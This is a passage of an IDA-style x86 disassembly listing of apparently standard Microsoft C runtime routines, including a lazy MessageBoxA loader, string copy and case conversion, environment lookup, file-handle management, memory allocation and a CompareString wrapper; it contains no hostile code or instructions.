pop ecx
mov dword_410650, 1
locret_40844E: ; CODE XREF: sub_408433+7�j
retn
sub_408433 endp
; =============== S U B R O U T I N E =======================================
sub_40844F proc near ; CODE XREF: sub_406BC4+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_40E674, ebx
push esi
push edi
jnz short loc_40849E
push offset aUser32_dll ; "user32.dll"
call dword_40A070 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4084D4
mov esi, dword_40A074
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_40E674, eax
jz short loc_4084D4
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_40E678, eax
call esi ; GetProcAddress
mov dword_40E67C, eax
loc_40849E: ; CODE XREF: sub_40844F+B�j
mov eax, dword_40E678
test eax, eax
jz short loc_4084BD
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4084BD
mov eax, dword_40E67C
test eax, eax
jz short loc_4084BD
push ebx
call eax
mov ebx, eax
loc_4084BD: ; CODE XREF: sub_40844F+56�j
; sub_40844F+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_40E674
loc_4084D0: ; CODE XREF: sub_40844F+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4084D4: ; CODE XREF: sub_40844F+1C�j
; sub_40844F+33�j
xor eax, eax
jmp short loc_4084D0
sub_40844F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4084E0 proc near ; CODE XREF: sub_406BC4+C5�p
; sub_40728A+184�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_408563
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_408504
shr ecx, 2
jnz short loc_408571
jmp short loc_408525
; ---------------------------------------------------------------------------
loc_408504: ; CODE XREF: sub_4084E0+1B�j
; sub_4084E0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_408532
test al, al
jz short loc_40853A
test esi, 3
jnz short loc_408504
mov ebx, ecx
shr ecx, 2
jnz short loc_408571
loc_408520: ; CODE XREF: sub_4084E0+8F�j
and ebx, 3
jz short loc_408532
loc_408525: ; CODE XREF: sub_4084E0+22�j
; sub_4084E0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40855E
dec ebx
jnz short loc_408525
loc_408532: ; CODE XREF: sub_4084E0+2B�j
; sub_4084E0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40853A: ; CODE XREF: sub_4084E0+2F�j
test edi, 3
jz short loc_408554
loc_408542: ; CODE XREF: sub_4084E0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4085D6
test edi, 3
jnz short loc_408542
loc_408554: ; CODE XREF: sub_4084E0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4085C7
loc_40855B: ; CODE XREF: sub_4084E0+7F�j
; sub_4084E0+F4�j
mov [edi], al
inc edi
loc_40855E: ; CODE XREF: sub_4084E0+4D�j
dec ebx
jnz short loc_40855B
pop ebx
pop esi
loc_408563: ; CODE XREF: sub_4084E0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_408569: ; CODE XREF: sub_4084E0+A9�j
; sub_4084E0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_408520
loc_408571: ; CODE XREF: sub_4084E0+20�j
; sub_4084E0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_408569
test dl, dl
jz short loc_4085BB
test dh, dh
jz short loc_4085B1
test edx, 0FF0000h
jz short loc_4085A7
test edx, 0FF000000h
jnz short loc_408569
mov [edi], edx
jmp short loc_4085BF
; ---------------------------------------------------------------------------
loc_4085A7: ; CODE XREF: sub_4084E0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4085BF
; ---------------------------------------------------------------------------
loc_4085B1: ; CODE XREF: sub_4084E0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4085BF
; ---------------------------------------------------------------------------
loc_4085BB: ; CODE XREF: sub_4084E0+AD�j
xor edx, edx
mov [edi], edx
loc_4085BF: ; CODE XREF: sub_4084E0+C5�j
; sub_4084E0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4085D1
loc_4085C7: ; CODE XREF: sub_4084E0+79�j
xor eax, eax
loc_4085C9: ; CODE XREF: sub_4084E0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4085C9
loc_4085D1: ; CODE XREF: sub_4084E0+E5�j
and ebx, 3
jnz short loc_40855B
loc_4085D6: ; CODE XREF: sub_4084E0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4084E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085DE proc near ; CODE XREF: sub_406D2E+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_40E480, 0
push ebx
jnz short loc_408609
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_4086A7
cmp eax, 7Ah
jg loc_4086A7
sub eax, 20h
jmp loc_4086A7
; ---------------------------------------------------------------------------
loc_408609: ; CODE XREF: sub_4085DE+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_40863C
cmp dword_40DC8C, 1
jle short loc_408629
push 2
push ebx
call sub_40617E
pop ecx
pop ecx
jmp short loc_408634
; ---------------------------------------------------------------------------
loc_408629: ; CODE XREF: sub_4085DE+3D�j
mov eax, off_40DA80
mov al, [eax+ebx*2]
and eax, 2
loc_408634: ; CODE XREF: sub_4085DE+49�j
test eax, eax
jnz short loc_40863C
loc_408638: ; CODE XREF: sub_4085DE+AF�j
mov eax, ebx
jmp short loc_4086A7
; ---------------------------------------------------------------------------
loc_40863C: ; CODE XREF: sub_4085DE+34�j
; sub_4085DE+58�j
mov edx, off_40DA80
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_40865F
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_408668
; ---------------------------------------------------------------------------
loc_40865F: ; CODE XREF: sub_4085DE+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_408668: ; CODE XREF: sub_4085DE+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword_40E480
call sub_407DDE
add esp, 20h
test eax, eax
jz short loc_408638
cmp eax, 1
jnz short loc_40869A
movzx eax, [ebp+var_4]
jmp short loc_4086A7
; ---------------------------------------------------------------------------
loc_40869A: ; CODE XREF: sub_4085DE+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4086A7: ; CODE XREF: sub_4085DE+14�j
; sub_4085DE+1D�j ...
pop ebx
leave
retn
sub_4085DE endp
; =============== S U B R O U T I N E =======================================
sub_4086AA proc near ; CODE XREF: sub_40728A+23�p
arg_0 = dword ptr 4
cmp dword_41064C, 0
push ebx
push esi
mov esi, dword_40E420
push edi
jz short loc_408721
test esi, esi
jnz short loc_4086DB
cmp dword_40E428, esi
jz short loc_408721
call sub_408AA3
test eax, eax
jnz short loc_408721
mov esi, dword_40E420
test esi, esi
jz short loc_408721
loc_4086DB: ; CODE XREF: sub_4086AA+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_408721
push ebx
call sub_403B90
pop ecx
mov edi, eax
loc_4086EC: ; CODE XREF: sub_4086AA+6D�j
mov eax, [esi]
test eax, eax
jz short loc_408721
push eax
call sub_403B90
cmp eax, edi
pop ecx
jbe short loc_408714
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_408714
push edi
push ebx
push eax
call sub_408A64
add esp, 0Ch
test eax, eax
jz short loc_408719
loc_408714: ; CODE XREF: sub_4086AA+51�j
; sub_4086AA+59�j
add esi, 4
jmp short loc_4086EC
; ---------------------------------------------------------------------------
loc_408719: ; CODE XREF: sub_4086AA+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_408723
; ---------------------------------------------------------------------------
loc_408721: ; CODE XREF: sub_4086AA+10�j
; sub_4086AA+1C�j ...
xor eax, eax
loc_408723: ; CODE XREF: sub_4086AA+75�j
pop edi
pop esi
pop ebx
retn
sub_4086AA endp
; =============== S U B R O U T I N E =======================================
sub_408727 proc near ; CODE XREF: sub_4077D4+6B�p
; sub_40786E+160�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov dword_40E3FC, ecx
mov eax, offset dword_40E280
loc_408738: ; CODE XREF: sub_408727+1E�j
cmp ecx, [eax]
jz short loc_40875C
add eax, 8
inc edx
cmp eax, offset dword_40E3E8
jb short loc_408738
cmp ecx, 13h
jb short loc_408769
cmp ecx, 24h
ja short loc_408769
mov dword_40E3F8, 0Dh
retn
; ---------------------------------------------------------------------------
loc_40875C: ; CODE XREF: sub_408727+13�j
mov eax, dword_40E284[edx*8]
mov dword_40E3F8, eax
retn
; ---------------------------------------------------------------------------
loc_408769: ; CODE XREF: sub_408727+23�j
; sub_408727+28�j
cmp ecx, 0BCh
jb short loc_408783
cmp ecx, 0CAh
mov dword_40E3F8, 8
jbe short locret_40878D
loc_408783: ; CODE XREF: sub_408727+48�j
mov dword_40E3F8, 16h
locret_40878D: ; CODE XREF: sub_408727+5A�j
retn
sub_408727 endp
; =============== S U B R O U T I N E =======================================
sub_40878E proc near ; CODE XREF: sub_409081+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_410620
push edi
jnb short loc_4087F1
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:410520h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_4087F1
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4087F1
cmp dword_40BA44, 1
jnz short loc_4087E7
xor eax, eax
sub ecx, eax
jz short loc_4087DE
dec ecx
jz short loc_4087D9
dec ecx
jnz short loc_4087E7
push eax
push 0FFFFFFF4h
jmp short loc_4087E1
; ---------------------------------------------------------------------------
loc_4087D9: ; CODE XREF: sub_40878E+41�j
push eax
push 0FFFFFFF5h
jmp short loc_4087E1
; ---------------------------------------------------------------------------
loc_4087DE: ; CODE XREF: sub_40878E+3E�j
push eax
push 0FFFFFFF6h
loc_4087E1: ; CODE XREF: sub_40878E+49�j
; sub_40878E+4E�j
call dword_40A06C ; SetStdHandle
loc_4087E7: ; CODE XREF: sub_40878E+38�j
; sub_40878E+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_408805
; ---------------------------------------------------------------------------
loc_4087F1: ; CODE XREF: sub_40878E+C�j
; sub_40878E+2A�j ...
and dword_40E3FC, 0
mov dword_40E3F8, 9
or eax, 0FFFFFFFFh
loc_408805: ; CODE XREF: sub_40878E+61�j
pop edi
pop esi
retn
sub_40878E endp
; =============== S U B R O U T I N E =======================================
sub_408808 proc near ; CODE XREF: sub_4077D4+2D�p
; sub_408B67+25�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_410620
jnb short loc_408830
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_410520[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_408830
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_408830: ; CODE XREF: sub_408808+A�j
; sub_408808+23�j
and dword_40E3FC, 0
mov dword_40E3F8, 9
or eax, 0FFFFFFFFh
retn
sub_408808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408845 proc near ; CODE XREF: sub_407A85+22�p
; sub_407A85+3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+arg_0], esi
ja short loc_408866
test esi, esi
jnz short loc_408860
push 1
pop esi
loc_408860: ; CODE XREF: sub_408845+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_408866: ; CODE XREF: sub_408845+12�j
; sub_408845+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_4088C5
mov eax, dword_410644
cmp eax, 3
jnz short loc_408891
mov eax, [ebp+arg_0]
cmp eax, dword_41063C
ja short loc_4088B0
push eax
call sub_4048C8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4088DB
jmp short loc_4088B0
; ---------------------------------------------------------------------------
loc_408891: ; CODE XREF: sub_408845+30�j
cmp eax, 2
jnz short loc_4088B0
cmp esi, dword_40DA74
ja short loc_4088B0
mov eax, esi
shr eax, 4
push eax
call sub_40536B
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4088EF
loc_4088B0: ; CODE XREF: sub_408845+3B�j
; sub_408845+4A�j ...
push esi
push 8
push dword_410640
call dword_40A110 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_4088E9
loc_4088C5: ; CODE XREF: sub_408845+26�j
cmp dword_40E46C, 0
jz short loc_4088E9
push esi
call sub_40433F
test eax, eax
pop ecx
jz short loc_4088F2
jmp short loc_408866
; ---------------------------------------------------------------------------
loc_4088DB: ; CODE XREF: sub_408845+48�j
push [ebp+arg_0]
loc_4088DE: ; CODE XREF: sub_408845+AB�j
push 0
push edi
call sub_403AC0
add esp, 0Ch
loc_4088E9: ; CODE XREF: sub_408845+7E�j
; sub_408845+87�j
mov eax, edi
loc_4088EB: ; CODE XREF: sub_408845+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4088EF: ; CODE XREF: sub_408845+69�j
push esi
jmp short loc_4088DE
; ---------------------------------------------------------------------------
loc_4088F2: ; CODE XREF: sub_408845+92�j
xor eax, eax
jmp short loc_4088EB
sub_408845 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_407B2A
loc_4088F6: ; CODE XREF: sub_407B2A+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp dword_410500, esi
jle short loc_408949
loc_408905: ; CODE XREF: sub_407B2A+E1D�j
mov eax, dword_40F4E8
mov eax, [eax+esi*4]
test eax, eax
jz short loc_408940
test byte ptr [eax+0Ch], 83h
jz short loc_408924
push eax
call sub_408B11
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408924
inc edi
loc_408924: ; CODE XREF: sub_407B2A+DEB�j
; sub_407B2A+DF7�j
cmp esi, 14h
jl short loc_408940
mov eax, dword_40F4E8
push dword ptr [eax+esi*4]
call sub_403B18
mov eax, dword_40F4E8
pop ecx
and dword ptr [eax+esi*4], 0
loc_408940: ; CODE XREF: sub_407B2A+DE5�j
; sub_407B2A+DFD�j
inc esi
cmp esi, dword_410500
jl short loc_408905
loc_408949: ; CODE XREF: sub_407B2A+DD9�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_407B2A
; =============== S U B R O U T I N E =======================================
sub_40894E proc near ; CODE XREF: sub_4089EE+2D�p
; sub_4089EE+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_408960
push esi
call sub_4089EE
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_408960: ; CODE XREF: sub_40894E+7�j
push esi
call sub_408989
test eax, eax
pop ecx
jz short loc_408970
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408970: ; CODE XREF: sub_40894E+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_408985
push dword ptr [esi+10h]
call sub_408B67
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_408985: ; CODE XREF: sub_40894E+26�j
xor eax, eax
pop esi
retn
sub_40894E endp
; =============== S U B R O U T I N E =======================================
sub_408989 proc near ; CODE XREF: sub_40894E+13�p
; sub_408B11+1A�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_4089D6
test ax, 108h
jz short loc_4089D6
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_4089D6
push edi
push eax
push dword ptr [esi+10h]
call sub_40786E
add esp, 0Ch
cmp eax, edi
jnz short loc_4089CF
mov eax, [esi+0Ch]
test al, 80h
jz short loc_4089D6
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_4089D6
; ---------------------------------------------------------------------------
loc_4089CF: ; CODE XREF: sub_408989+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_4089D6: ; CODE XREF: sub_408989+14�j
; sub_408989+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_408989 endp
; =============== S U B R O U T I N E =======================================
sub_4089E5 proc near ; CODE XREF: sub_407B2A�p
push 1
call sub_4089EE
pop ecx
retn
sub_4089E5 endp
; =============== S U B R O U T I N E =======================================
sub_4089EE proc near ; CODE XREF: sub_40894E+A�p
; sub_4089E5+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp dword_410500, esi
jle short loc_408A4C
loc_4089FF: ; CODE XREF: sub_4089EE+5C�j
mov eax, dword_40F4E8
mov eax, [eax+esi*4]
test eax, eax
jz short loc_408A43
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_408A43
cmp [esp+0Ch+arg_0], 1
jnz short loc_408A29
push eax
call sub_40894E
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408A43
inc ebx
jmp short loc_408A43
; ---------------------------------------------------------------------------
loc_408A29: ; CODE XREF: sub_4089EE+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_408A43
test cl, 2
jz short loc_408A43
push eax
call sub_40894E
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_408A43
or edi, eax
loc_408A43: ; CODE XREF: sub_4089EE+1B�j
; sub_4089EE+23�j ...
inc esi
cmp esi, dword_410500
jl short loc_4089FF
loc_408A4C: ; CODE XREF: sub_4089EE+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_408A57
mov eax, edi
loc_408A57: ; CODE XREF: sub_4089EE+65�j
pop edi
pop esi
pop ebx
retn
sub_4089EE endp
; =============== S U B R O U T I N E =======================================
sub_408A5B proc near ; CODE XREF: sub_405917+3F0�p
; sub_405917+40B�p ...
push 2
call sub_4042F6
pop ecx
retn
sub_408A5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A64 proc near ; CODE XREF: sub_4086AA+5E�p
; sub_408FC2+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_408A71
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_408A71: ; CODE XREF: sub_408A64+7�j
push dword_40F2BC
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push dword_40F4E4
call sub_408BBE
add esp, 1Ch
test eax, eax
jnz short loc_408A9E
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_408A9E: ; CODE XREF: sub_408A64+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_408A64 endp
; =============== S U B R O U T I N E =======================================
sub_408AA3 proc near ; CODE XREF: sub_4086AA+1E�p
; sub_408E3B+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword_40E428
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_408B04
mov ebx, dword_40A0B4
loc_408ABC: ; CODE XREF: sub_408AA3+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_408B0C
push ebp
call sub_40345E
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_408B0C
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_408B0C
push edi
push [esp+18h+var_4]
call sub_408E3B
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_408ABC
loc_408B04: ; CODE XREF: sub_408AA3+11�j
xor eax, eax
loc_408B06: ; CODE XREF: sub_408AA3+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_408B0C: ; CODE XREF: sub_408AA3+29�j
; sub_408AA3+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_408B06
sub_408AA3 endp
; =============== S U B R O U T I N E =======================================
sub_408B11 proc near ; CODE XREF: sub_407B2A+DEE�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_408B26
or eax, 0FFFFFFFFh
jmp short loc_408B60
; ---------------------------------------------------------------------------
loc_408B26: ; CODE XREF: sub_408B11+E�j
test al, 83h
jz short loc_408B5E
push esi
call sub_408989
push esi
mov edi, eax
call sub_409134
push dword ptr [esi+10h]
call sub_409081
add esp, 0Ch
test eax, eax
jge short loc_408B4C
or edi, 0FFFFFFFFh
jmp short loc_408B5E
; ---------------------------------------------------------------------------
loc_408B4C: ; CODE XREF: sub_408B11+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_408B5E
push eax
call sub_403B18
and dword ptr [esi+1Ch], 0
pop ecx
loc_408B5E: ; CODE XREF: sub_408B11+17�j
; sub_408B11+39�j ...
mov eax, edi
loc_408B60: ; CODE XREF: sub_408B11+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_408B11 endp
; =============== S U B R O U T I N E =======================================
sub_408B67 proc near ; CODE XREF: sub_40894E+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_410620
jnb short loc_408BB0
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, dword_410520[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_408BB0
push eax
call sub_408808
pop ecx
push eax
call dword_40A068 ; FlushFileBuffers
test eax, eax
jnz short loc_408BA5
call dword_40A0F4 ; RtlGetLastWin32Error
jmp short loc_408BA7
; ---------------------------------------------------------------------------
loc_408BA5: ; CODE XREF: sub_408B67+34�j
xor eax, eax
loc_408BA7: ; CODE XREF: sub_408B67+3C�j
test eax, eax
jz short locret_408BBD
mov dword_40E3FC, eax
loc_408BB0: ; CODE XREF: sub_408B67+A�j
; sub_408B67+22�j
mov dword_40E3F8, 9
or eax, 0FFFFFFFFh
locret_408BBD: ; CODE XREF: sub_408B67+42�j
retn
sub_408B67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408BBE proc near ; CODE XREF: sub_408A64+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40A620
push offset sub_403FB8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword_40E680, ebx
push 1
pop edi
jnz short loc_408C31
push edi
mov eax, offset dword_40A5B0
push eax
push edi
push eax
push ebx
push ebx
call dword_40A060 ; CompareStringW
test eax, eax
jz short loc_408C0E
mov dword_40E680, edi
jmp short loc_408C31
; ---------------------------------------------------------------------------
loc_408C0E: ; CODE XREF: sub_408BBE+46�j
push edi
mov eax, offset dword_40A5AC
push eax
push edi
push eax
push ebx
push ebx
call dword_40A064 ; CompareStringA
test eax, eax
jz loc_408E27
mov dword_40E680, 2
loc_408C31: ; CODE XREF: sub_408BBE+31�j
; sub_408BBE+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_408C48
push esi
push [ebp+arg_8]
call sub_408002
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_408C48: ; CODE XREF: sub_408BBE+78�j
cmp [ebp+arg_14], ebx
jle short loc_408C5D
push [ebp+arg_14]
push [ebp+arg_10]
call sub_408002
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_408C5D: ; CODE XREF: sub_408BBE+8D�j
mov eax, dword_40E680
cmp eax, 2
jnz short loc_408C82
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40A064 ; CompareStringA
jmp loc_408E29
; ---------------------------------------------------------------------------
loc_408C82: ; CODE XREF: sub_408BBE+A7�j
cmp eax, edi
jnz loc_408E27
cmp [ebp+arg_18], ebx
jnz short loc_408C97
mov eax, dword_40E490
mov [ebp+arg_18], eax
loc_408C97: ; CODE XREF: sub_408BBE+CF�j
cmp esi, ebx
jz short loc_408CA4
cmp [ebp+arg_14], ebx
jnz loc_408D3C
loc_408CA4: ; CODE XREF: sub_408BBE+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_408CB1
loc_408CA9: ; CODE XREF: sub_408BBE+13C�j
; sub_408BBE+16D�j
push 2
loc_408CAB: ; CODE XREF: sub_408BBE+146�j
pop eax
jmp loc_408E29
; ---------------------------------------------------------------------------
loc_408CB1: ; CODE XREF: sub_408BBE+E9�j
cmp [ebp+arg_14], edi
jle short loc_408CBD
loc_408CB6: ; CODE XREF: sub_408BBE+151�j
; sub_408BBE+159�j ...
mov eax, edi
jmp loc_408E29
; ---------------------------------------------------------------------------
loc_408CBD: ; CODE XREF: sub_408BBE+F6�j
cmp esi, edi
jg short loc_408D02
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call dword_40A080 ; GetCPInfo
test eax, eax
jz loc_408E27
cmp esi, ebx
jle short loc_408D06
cmp [ebp+var_3C], 2
jb short loc_408D02
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_408D02
loc_408CE8: ; CODE XREF: sub_408BBE+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_408D02
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_408CFC
cmp cl, dl
jbe short loc_408CA9
loc_408CFC: ; CODE XREF: sub_408BBE+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_408CE8
loc_408D02: ; CODE XREF: sub_408BBE+101�j
; sub_408BBE+120�j ...
push 3
jmp short loc_408CAB
; ---------------------------------------------------------------------------
loc_408D06: ; CODE XREF: sub_408BBE+11A�j
cmp [ebp+arg_14], ebx
jle short loc_408D3C
cmp [ebp+var_3C], 2
jb short loc_408CB6
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_408CB6
loc_408D19: ; CODE XREF: sub_408BBE+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_408CB6
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_408D31
cmp cl, dl
jbe loc_408CA9
loc_408D31: ; CODE XREF: sub_408BBE+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_408D19
jmp loc_408CB6
; ---------------------------------------------------------------------------
loc_408D3C: ; CODE XREF: sub_408BBE+E0�j
; sub_408BBE+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call dword_40A094 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_408E27
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_403E90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_408D8B
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_408D8B: ; CODE XREF: sub_408BBE+1B5�j
cmp [ebp+var_24], ebx
jz loc_408E27
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, dword_40A094
